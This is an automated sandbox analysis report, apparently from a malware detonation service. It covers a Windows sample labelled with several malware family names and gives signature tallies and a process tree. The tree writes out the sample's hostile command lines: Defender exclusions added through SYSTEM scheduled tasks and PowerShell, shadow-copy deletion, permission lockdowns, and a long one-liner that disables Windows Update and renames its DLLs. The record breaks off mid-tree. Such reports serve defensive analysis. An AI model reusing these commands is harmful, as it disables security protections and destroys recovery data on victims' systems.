Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    09/08/2026, 20:02

General

  • Target
    2026-08-09_1dc96f630b005afc1ce68e055844bba0_cobalt-strike_coinminer_glassworm_icedid_njrat_vidar.exe
  • Size 40.7MB
  • Sample260809-ysf3jsvele
  • SHA256 19c4e279d6cfacf5db27f6618ceee33723508ff58c53d3aa468cae7dd2d22cd5
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Detects executables calling ClearMyTracksByProcess 1 IoCs
  • Detects executables containing artifacts associated with disabling Widnows Defender 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 23 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel 4 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-08-09_1dc96f630b005afc1ce68e055844bba0_cobalt-strike_coinminer_glassworm_icedid_njrat_vidar.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-08-09_1dc96f630b005afc1ce68e055844bba0_cobalt-strike_coinminer_glassworm_icedid_njrat_vidar.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3656
  • C:\Users\Public\bDTBuo\jBgiZS.exe
    C:\Users\Public\bDTBuo\jBgiZS.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\bDTBuo\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\bDTBuo\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2896
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:1132
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:5052
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:400
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2128
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1596
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:1460
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:5124
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:5288
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:5344
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:5208
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:5324
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:5372
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:5424
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5256
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5332
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5388
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:5432
                        • C:\Program Files (x86)\hL2VvT\PhIC7V.exe
                          "C:\Program Files (x86)\hL2VvT\PhIC7V.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:5776
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:6032
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6132
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3336
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:6200
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4708
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6324
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3516
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\PhIC7V.exe" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6464
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\PhIC7V.exe" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6508
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\PhIC7V.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3648
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\PhIC7V.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:6320
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\PhIC7V.exe" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6316
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\PhIC7V.exe" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3168
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\image.png" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:6660
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\image.png" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6596
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4872
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4420
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\image.png" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1824
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\image.png" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6608
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\thumbs.db" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6580
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\thumbs.db" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:7056
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2540
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:884
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:7104
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:7160
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\XPSPLOG.dll" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:6644
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\XPSPLOG.dll" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:6732
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3724
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:6780
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\hL2VvT\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6784
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\hL2VvT\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:6892
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force
                            3⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2100
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4116
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:2472
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4768
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:3616
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5372
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5440
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:5260
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5600
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5616
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5632
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:5648
                            • C:\Windows\SysWOW64\sc.exe
                              sc config uhssvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5664
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure uhssvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5676
                            • C:\Windows\SysWOW64\net.exe
                              net stop WaaSMedicSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5688
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WaaSMedicSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:5556
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WaaSMedicSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:5716
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure WaaSMedicSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:5732
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5752
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5768
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5544
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:936
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /f C:\Windows\System32\wuaueng.dll
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5856
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:5888
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5904
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5980
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:5952
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:6004
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:6020
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:6028
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\hL2VvT\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • Suspicious use of WriteProcessMemory
                            PID:3084
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\hL2VvT\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:3064
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:1132
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2124
                            • C:\Windows\SysWOW64\cmd.exe
